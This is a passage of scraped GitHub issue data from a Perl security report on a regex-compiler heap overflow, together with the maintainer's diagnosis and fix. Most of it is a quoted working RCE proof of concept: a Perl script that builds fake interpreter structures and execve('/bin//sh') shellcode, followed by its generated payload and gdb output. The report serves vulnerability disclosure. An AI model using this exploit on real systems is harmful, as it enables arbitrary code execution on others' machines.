out\u0026gt;,\u003cbr\u003e\nenv=\u0026lt;optimized out\u0026gt;) at perlmain.c:133\u003cbr\u003e\n(gdb) c\u003cbr\u003e\nContinuing.\u003cbr\u003e\nprocess 13359 is executing new program: /usr/bin/bash\u003cbr\u003e\nError in re-setting breakpoint 2: Function \"S_mg_free_struct\" not defined.\u003cbr\u003e\nsh-4.4$ date\u003cbr\u003e\nDetaching after fork from child process 13509.\u003cbr\u003e\nMon Aug 27 22:04:46 JST 2018\u003cbr\u003e\n```\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e2018-08-16 12:52 GMT+09:00 Karl Williamson via RT \u0026lt;\u003cbr\u003e\nperl5-security-report-followup@perl.org\u0026gt;:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eResending this as it did not make it to the list:\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOn Wed, 15 Aug 2018 11:01:24 -0700, khw wrote:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eI suspect this is a serious security issue. One can position where\u003cbr\u003e\nbeyond the end of buffer gets written by adding \\x80's to the ones\u003cbr\u003e\nalready there. But I'd be happy to be wrong about this.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe cause is one branch during the parsing leaves the parse pointer\u003cbr\u003e\npositioned one too far, and that causes the backslash to be skipped\u003cbr\u003e\nduring pass2, which causes a ']' to be treated as a metacharacter\u003cbr\u003e\ninstead of a literal.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe fix is to remove the single line that incorrectly increments the\u003cbr\u003e\nparse pointer.\u003cbr\u003e\nI don't know that this being an experimental feature has any bearing\u003cbr\u003e\non it.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThere is another thing. The minus sign in this case could have been\u003cbr\u003e\ncaught as incorrect. But the same out-of-bounds writes would occur if\u003cbr\u003e\na '^' replaced the minus, and that would be a correct use.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eKarl Williamson\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/blockquote\u003e","bodyVersion":"d2f8bfc20b4100d145e7d7f3e591fce14018fd986657728b6c9ffc8ba490bc0d","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097445","createdAt":"2018-08-27T13:41:33Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZXuePsgAqTU0NDA5NzQ0NQ=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097448,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ0OA==","body":"### From @khwilliamson\n\nOn 08/27/2018 07\u0026#8203;:16 AM\\, Eiichi Tsukata wrote\u0026#8203;:\n\u003e The following code generates a regexp which executes arbitrary command \n\u003e during global destruction\\.\n\u003e It overwrites some SV pointer address to a crafted fake SV on \n\u003e overwritten heap which has the malicious svt\\_free\\(shell\\_code\\) on its \n\u003e magic vtable\\.\n\u003e \n\u003e Limitations\u0026#8203;:\n\u003e \n\u003e \\- must set \\`execstack \\-s\\` to perl\n\u003e \\- require address leak\\(exact address of overwritten heap\\)\n\u003e \nShouldn't this be getting a CVE?\n\u003e \\`\\`\\`\n\u003e \\#\\!/usr/bin/perl\n\u003e \n\u003e \\#\n\u003e \\# RCE exploit PoC for\n\u003e \\# \\[perl \\#133423\\] regcomp\u0026#8203;: heap\\-buffer\\-overflow write\n\u003e \\# on perl\\-blead\\-48ae8dc\n\u003e \\#\n\u003e \n\u003e use strict;\n\u003e use warnings;\n\u003e \n\u003e \\# 0xabcd =\u003e '\\\\xcd\\\\xab\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00'\n\u003e sub h2s \\{\n\u003e my $h = shift;\n\u003e my $sz = shift;\n\u003e my $ret = '';\n\u003e for \\(0\\.\\.\\($sz \\- 1\\)\\) \\{\n\u003e $ret \\.= sprintf\\(\"\\\\\\\\x%02x\"\\, \\(\\($h \u003e\u003e \\(8 \\* $\\_\\)\\) \u0026 0xff\\)\\);\n\u003e \\}\n\u003e return $ret\n\u003e \\}\n\u003e \n\u003e \\# must set \\`execstack \\-s\\` to perl\n\u003e my $cmd = 'gdb \\-q \\-\\-args \n\u003e ~/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl \\-DorD \\-le ';\n\u003e my $prefix = '\\\\'my $r = \"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\\\\\\\\\\\\\a\\]\\)\\)\\\\\\\\\\\\\\\\\\]a\\\\x00';\n\u003e \n\u003e my $address = 0xa34c7d; \\# overwrite start address\n\u003e \\# search with\u0026#8203;:\n\u003e \\# \\(gdb\\) b regcomp\\.c\u0026#8203;:14044\n\u003e \\# \\(gdb\\) p s\n\u003e \\# \\[CAUTION\\] must not contain '\\]' \\(0x5d\\)\n\u003e \\#\n\u003e my $sv\\_any\\_address = $address \\+ 8 \\+ 4 \\+ 4 \\+ 8;\n\u003e my $stash\\_address = $sv\\_any\\_address \\+ 8 \\+ 8;\n\u003e my $stash\\_address2 = $stash\\_address \\+ 8 \\+ 4 \\+ 4;\n\u003e my $magic\\_address = $stash\\_address \\+ 8 \\+ 4 \\+ 4 \\+ 8 \\+ 8 \\+ 8 \\+ 19 \\+ 8;\n\u003e my $mg\\_virtual\\_address = $magic\\_address \\+ 8 \\+ 8 \\+ 2 \\+ 1 \\+ 1 \\+ 8 \\+ 8 \\+ 8;\n\u003e my $shell\\_code\\_address = $mg\\_virtual\\_address \\+ 8 \\+ 8 \\+ 8 \\+ 8 \\+ 8;\n\u003e \n\u003e my $body =\n\u003e \\# sv\\($address\\)\n\u003e h2s\\($sv\\_any\\_address\\, 8\\)\n\u003e \\. h2s\\(0x01\\, 4\\) \\# sv\\_refcnt\n\u003e \\. h2s\\(0x100007\\, 4\\) \\# sv\\_flags \\(SVt\\_PVMG || SVs\\_OBJECT\\)\n\u003e \\. h2s\\(0x00\\, 8\\) \\# sv\\-\u003esv\\_u\\.svu\\_pv\n\u003e \\# any\\($sv\\_any\\_address\\)\n\u003e \\. h2s\\($stash\\_address\\, 8\\) \\# HV\\* xmg\\_stash\n\u003e \\. h2s\\($magic\\_address\\, 8\\) \\# union \\_xmgu xmg\\_u \\(MAGIC\\* xmg\\_magic\\)\n\u003e \n\u003e \\# xmg\\_stash\\($stash\\_address\\)\n\u003e \\. h2s\\($stash\\_address2\\, 8\\) \\# sv\\_any\n\u003e \\. h2s\\(0x01\\, 4\\) \\# sv\\_refcnt\n\u003e \\. h2s\\(0x0c\\, 4\\) \\# sv\\_flags \\(SVt\\_PVHV\\)\n\u003e \\# any\\($stash\\_address2\\)\n\u003e \\. h2s\\(0x00\\, 8\\) \\# HV\\* xmg\\_stash\n\u003e \\. h2s\\($magic\\_address\\, 8\\) \\# union \\_xmgu xmg\\_u \\(MAGIC\\* xmg\\_magic\\)\n\u003e \\. h2s\\(0x00\\, 8\\) \\# padding\n\u003e \n\u003e \\. '\" \\. \"a\" x 19 \\. \"' \\# padding\n\u003e \\. h2s\\($address\\, 8\\) \\# OVERWRITE gvp\n\u003e \n\u003e \\# xmg\\_magic\\($magic\\_address\\)\n\u003e \\. h2s\\(0x00\\, 8\\) \\# MAGIC\\* mg\\_moremagic;\n\u003e \\. h2s\\($mg\\_virtual\\_address\\, 8\\) \\# MGVTBL\\* mg\\_virtual /\\* pointer to magic \n\u003e functions \\*/\n\u003e \\. h2s\\(0x00\\, 2\\) \\# U16 mg\\_private;\n\u003e \\. h2s\\(0x00\\, 1\\) \\# char mg\\_type;\n\u003e \\. h2s\\(0x00\\, 1\\) \\# U8 mg\\_flags;\n\u003e \\. h2s\\(0x00\\, 8\\) \\# SSize\\_t mg\\_len;\n\u003e \\. h2s\\(0x00\\, 8\\) \\# SV\\* mg\\_obj;\n\u003e \\. h2s\\(0x00\\, 8\\) \\# char\\* mg\\_ptr;\n\u003e \n\u003e \\# mg\\_virual\\($mg\\_virtual\\_address\\)\n\u003e \\. h2s\\(0x00\\, 8\\) \\# int \\(\\*svt\\_get\\) \\(pTHX\\_ SV \\*sv\\, \n\u003e MAGIC\\* mg\\);\n\u003e \\. h2s\\(0x00\\, 8\\) \\# int \\(\\*svt\\_set\\) \\(pTHX\\_ SV \\*sv\\, \n\u003e MAGIC\\* mg\\);\n\u003e \\. h2s\\(0x00\\, 8\\) \\# U32 \\(\\*svt\\_len\\) \\(pTHX\\_ SV \\*sv\\, \n\u003e MAGIC\\* mg\\);\n\u003e \\. h2s\\(0x00\\, 8\\) \\# int \\(\\*svt\\_clear\\)\\(pTHX\\_ SV \\*sv\\, MAGIC\\* mg\\);\n\u003e \\. h2s\\($shell\\_code\\_address\\, 8\\) \\# int \\(\\*svt\\_free\\) \\(pTHX\\_ SV \\*sv\\, \n\u003e MAGIC\\* mg\\);\n\u003e \n\u003e \\# x86\\_64 shell\\_code\n\u003e \\. \n\u003e '\\\\x48\\\\x31\\\\xd2\\\\x52\\\\x48\\\\xb8\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x50\\\\x48\\\\x89\\\\xe7\\\\x52\\\\x57\\\\x48\\\\x89\\\\xe6\\\\x48\\\\x8d\\\\x42\\\\x3b\\\\x0f\\\\x05'\n\u003e \n\u003e \\. '\\]\\)a\\\\\\\\\\\\\\\\6\"; qr/$r/\\\\'';\n\u003e \n\u003e my $payload = $prefix \\. $body;\n\u003e \n\u003e print $cmd \\. $payload \\. \"\\\\n\";\n\u003e \\`\\`\\`\n\u003e \n\u003e Sample output\n\u003e \n\u003e \\`\\`\\`\n\u003e \\[eiichi@\u0026#8203;x1 exploit\\]$ perl perl\\_regexp\\_mg\\_free\\.pl \n\u003e \\\u003chttp\u0026#8203;://perl\\_regexp\\_mg\\_free\\.pl\u003e\n\u003e gdb \\-q \\-\\-args ~/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl \\-DorD \\-le \n\u003e 'my $r = \n\u003e \"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\\\\\a\\]\\)\\)\\\\\\\\\\]a\\\\x00\\\\x95\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x07\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xa5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x0c\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\" \n\u003e \\. \"a\" x 19 \\. \n\u003e \"\\\\x7d\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x14\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x3c\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x48\\\\x31\\\\xd2\\\\x52\\\\x48\\\\xb8\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x50\\\\x48\\\\x89\\\\xe7\\\\x52\\\\x57\\\\x48\\\\x89\\\\xe6\\\\x48\\\\x8d\\\\x42\\\\x3b\\\\x0f\\\\x05\\]\\)a\\\\\\\\6\"; \n\u003e qr/$r/'\n\u003e \\[eiichi@\u0026#8203;x1 exploit\\]$ gdb \\-q \\-\\-args \n\u003e ~/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl \\-DorD \\-le 'my $r = \n\u003e \"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\\\\\a\\]\\)\\)\\\\\\\\\\]a\\\\x00\\\\x95\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x07\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xa5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x0c\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\" \n\u003e \\. \"a\" x 19 \\. \n\u003e \"\\\\x7d\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x14\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x3c\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x48\\\\x31\\\\xd2\\\\x52\\\\x48\\\\xb8\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x50\\\\x48\\\\x89\\\\xe7\\\\x52\\\\x57\\\\x48\\\\x89\\\\xe6\\\\x48\\\\x8d\\\\x42\\\\x3b\\\\x0f\\\\x05\\]\\)a\\\\\\\\6\"; \n\u003e qr/$r/'\n\u003e Reading symbols from \n\u003e /home/eiichi/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl\\.\\.\\.done\\.\n\u003e \\(gdb\\) b regcomp\\.c\u0026#8203;:14044\n\u003e Breakpoint 1 at 0x4cb38d\u0026#8203;: file regcomp\\.c\\, line 14044\\.\n\u003e \\(gdb\\) run\n\u003e Starting program\u0026#8203;: \n\u003e /home/eiichi/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl \\-DorD \\-le \n\u003e my\\\\ \\\\$r\\\\ =\\\\ \n\u003e \\\\\"\\\\\\(\\\\?\\\\\\[\\\\\\(\\\\?x\u0026#8203;:\\\\\\(\\\\?\\\\\\[\\\\\\\\\\\\\\\\a\\\\\\]\\\\\\)\\\\\\)\\\\\\\\\\\\\\\\\\\\\\]a\\\\\\\\x00\\\\\\\\x95\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x01\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x07\\\\\\\\x00\\\\\\\\x10\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\xa5\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\xe8\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\xb5\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x01\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x0c\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\xe8\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\"\\\\ \n\u003e \\.\\\\ \\\\\"a\\\\\"\\\\ x\\\\ 19\\\\ \\.\\\\ \n\u003e \\\\\"\\\\\\\\x7d\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x14\\\\\\\\x4d\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x3c\\\\\\\\x4d\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x48\\\\\\\\x31\\\\\\\\xd2\\\\\\\\x52\\\\\\\\x48\\\\\\\\xb8\\\\\\\\x2f\\\\\\\\x62\\\\\\\\x69\\\\\\\\x6e\\\\\\\\x2f\\\\\\\\x2f\\\\\\\\x73\\\\\\\\x68\\\\\\\\x50\\\\\\\\x48\\\\\\\\x89\\\\\\\\xe7\\\\\\\\x52\\\\\\\\x57\\\\\\\\x48\\\\\\\\x89\\\\\\\\xe6\\\\\\\\x48\\\\\\\\x8d\\\\\\\\x42\\\\\\\\x3b\\\\\\\\x0f\\\\\\\\x05\\\\\\]\\\\\\)a\\\\\\\\\\\\\\\\6\\\\\"\\\\;\\\\ \n\u003e qr/\\\\$r/\n\u003e \\[Thread debugging using libthread\\_db enabled\\]\n\u003e Using host libthread\\_db library \"/lib64/libthread\\_db\\.so\\.1\"\\.\n\u003e warning\u0026#8203;: Loadable section \"\\.note\\.gnu\\.property\" outside of ELF segments\n\u003e warning\u0026#8203;: Loadable section \"\\.note\\.gnu\\.property\" outside of ELF segments\n\u003e warning\u0026#8203;: Loadable section \"\\.note\\.gnu\\.property\" outside of ELF segments\n\u003e \\(\\-e\u0026#8203;:0\\) sv\\_upgrade clearing PL\\_stashcache\n\u003e \\(\\-e\u0026#8203;:0\\) sv\\_upgrade clearing PL\\_stashcache\n\u003e \\(\\-e\u0026#8203;:0\\) sv\\_upgrade clearing PL\\_stashcache\n\u003e \\(\\-e\u0026#8203;:0\\) sv\\_upgrade clearing PL\\_stashcache\n\u003e \\(\\-e\u0026#8203;:0\\) sv\\_upgrade clearing PL\\_stashcache\n\u003e \\(\\-e\u0026#8203;:2\\) Looking for DESTROY method for IO\u0026#8203;::File\n\u003e \\(\\-e\u0026#8203;:2\\) Looking for method DESTROY in package IO\u0026#8203;::File\n\u003e \\(\\-e\u0026#8203;:2\\) Looking for method DESTROY in package UNIVERSAL\n\u003e \\(\\-e\u0026#8203;:2\\) Looking for method AUTOLOAD in package IO\u0026#8203;::File\n\u003e \\(\\-e\u0026#8203;:2\\) Looking for method AUTOLOAD in package UNIVERSAL\n\u003e \\(\\-e\u0026#8203;:2\\) Set cached DESTROY method 0 for IO\u0026#8203;::File\n\u003e Enabling $\\` $\u0026 $' support \\(0x7\\)\\.\n\u003e \n\u003e EXECUTING\\.\\.\\.\n\u003e \n\u003e Compiling REx \n\u003e \"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\a\\]\\)\\)\\\\\\]a%0%x\\{95\\}L%x\\{a3\\}%0%0%0%0%0%1%0%0%0%7%0%20%0\"\\.\\.\\.\n\u003e The regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in \n\u003e m/\\(?\\[ \\\u003c\\-\\- HERE \\(?x\u0026#8203;:\\(?\\[\\\\a\\]\\)\\)\\\\\\]a?L??L???L?\n\u003e \n\u003e \n\u003e ?aaaaaaaaaaaaaaaaaaa\\}L?M?\\\u003cM?H1H?/bin//shPH?WH??B;\\]\\)a\\\\6/ at \\-e line 1\\.\n\u003e The regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in \n\u003e m/\\(?\\[\\(?x\u0026#8203;:\\(?\\[ \\\u003c\\-\\- HERE \\\\a\\]\\)\\)\\\\\\]a?L??L???L?\n\u003e \n\u003e \n\u003e ?aaaaaaaaaaaaaaaaaaa\\}L?M?\\\u003cM?H1H?/bin//shPH?WH??B;\\]\\)a\\\\6/ at \\-e line 1\\.\n\u003e \n\u003e Breakpoint 1\\, S\\_regatom \\(pRExC\\_state=pRExC\\_state@\u0026#8203;entry=0x7fffffffcd40\\, \n\u003e flagp=flagp@\u0026#8203;entry=0x7fffffffca24\\,\n\u003e depth=depth@\u0026#8203;entry=4\\) at regcomp\\.c\u0026#8203;:14044\n\u003e 14044 \\*\\(s\\)\\+\\+ = \\(U8\\) ender;\n\u003e Missing separate debuginfos\\, use\u0026#8203;: dnf debuginfo\\-install \n\u003e keyutils\\-libs\\-1\\.5\\.10\\-6\\.fc28\\.x86\\_64 krb5\\-libs\\-1\\.16\\.1\\-13\\.fc28\\.x86\\_64 \n\u003e libcom\\_err\\-1\\.44\\.2\\-0\\.fc28\\.x86\\_64 \n\u003e libnsl2\\-1\\.2\\.0\\-2\\.20180605git4a062cf\\.fc28\\.x86\\_64 \n\u003e libselinux\\-2\\.8\\-1\\.fc28\\.x86\\_64 libtirpc\\-1\\.0\\.3\\-3\\.rc2\\.fc28\\.x86\\_64 \n\u003e libxcrypt\\-4\\.1\\.1\\-4\\.fc28\\.x86\\_64 openssl\\-libs\\-1\\.1\\.0h\\-3\\.fc28\\.x86\\_64 \n\u003e pcre2\\-10\\.31\\-8\\.fc28\\.x86\\_64 zlib\\-1\\.2\\.11\\-8\\.fc28\\.x86\\_64\n\u003e \\(gdb\\) p s\n\u003e $1 = 0xa34c7d \"\"\n\u003e \\(gdb\\) b S\\_mg\\_free\\_struct\n\u003e Breakpoint 2 at 0x4f0620\u0026#8203;: file mg\\.c\\, line 556\\.\n\u003e \\(gdb\\) dis br 1\n\u003e \\(gdb\\) c\n\u003e Continuing\\.\n\u003e panic\u0026#8203;: reg\\_node overrun trying to emit 0\\, a34d5c\u003e=a34c8c at \\-e line 1\\.\n\u003e Cleaning named glob SV object\u0026#8203;:\n\u003e SV = PVMG\\(0xa34c95\\) at 0xa34c7d\n\u003e REFCNT = 1\n\u003e FLAGS = \\(OBJECT\\)\n\u003e IV = 0\n\u003e NV = 5\\.28751820946919e\\-317\n\u003e PV = 0\n\u003e MAGIC = 0xa34ce8\n\u003e MG\\_VIRTUAL = 0xa34d14\n\u003e MG\\_TYPE = PERL\\_MAGIC\\_sv\\(\\\\0\\)\n\u003e STASH = 0xa34ca5\n\u003e \n\u003e Breakpoint 2\\, S\\_mg\\_free\\_struct \\(sv=sv@\u0026#8203;entry=0xa34ca5\\, mg=0xa34ce8\\) at \n\u003e mg\\.c\u0026#8203;:556\n\u003e 556 const MGVTBL\\* const vtbl = mg\\-\u003emg\\_virtual;\n\u003e \\(gdb\\) bt\n\u003e \\#0 S\\_mg\\_free\\_struct \\(sv=sv@\u0026#8203;entry=0xa34ca5\\, mg=0xa34ce8\\) at mg\\.c\u0026#8203;:556\n\u003e \\#1 0x00000000004f1153 in Perl\\_mg\\_free \\(sv=sv@\u0026#8203;entry=0xa34ca5\\) at mg\\.c\u0026#8203;:588\n\u003e \\#2 0x0000000000527d9e in Perl\\_sv\\_clear \\(orig\\_sv=orig\\_sv@\u0026#8203;entry=0xa34ca5\\) \n\u003e at sv\\.c\u0026#8203;:6539\n\u003e \\#3 0x0000000000528784 in Perl\\_sv\\_free2 \\(sv=0xa34ca5\\, rc=\\\u003coptimized \n\u003e out\u003e\\) at sv\\.c\u0026#8203;:7038\n\u003e \\#4 0x00000000005273ec in S\\_SvREFCNT\\_dec \\(sv=\\\u003coptimized out\u003e\\) at \n\u003e inline\\.h\u0026#8203;:216\n\u003e \\#5 S\\_curse \\(sv=sv@\u0026#8203;entry=0xa34c7d\\, check\\_refcnt=check\\_refcnt@\u0026#8203;entry=true\\) \n\u003e at sv\\.c\u0026#8203;:6970\n\u003e \\#6 0x000000000052783a in Perl\\_sv\\_clear \\(orig\\_sv=orig\\_sv@\u0026#8203;entry=0xa34c7d\\) \n\u003e at sv\\.c\u0026#8203;:6531\n\u003e \\#7 0x0000000000528784 in Perl\\_sv\\_free2 \\(sv=sv@\u0026#8203;entry=0xa34c7d\\, \n\u003e rc=\\\u003coptimized out\u003e\\) at sv\\.c\u0026#8203;:7038\n\u003e \\#8 0x0000000000528c48 in S\\_SvREFCNT\\_dec\\_NN \\(sv=0xa34c7d\\) 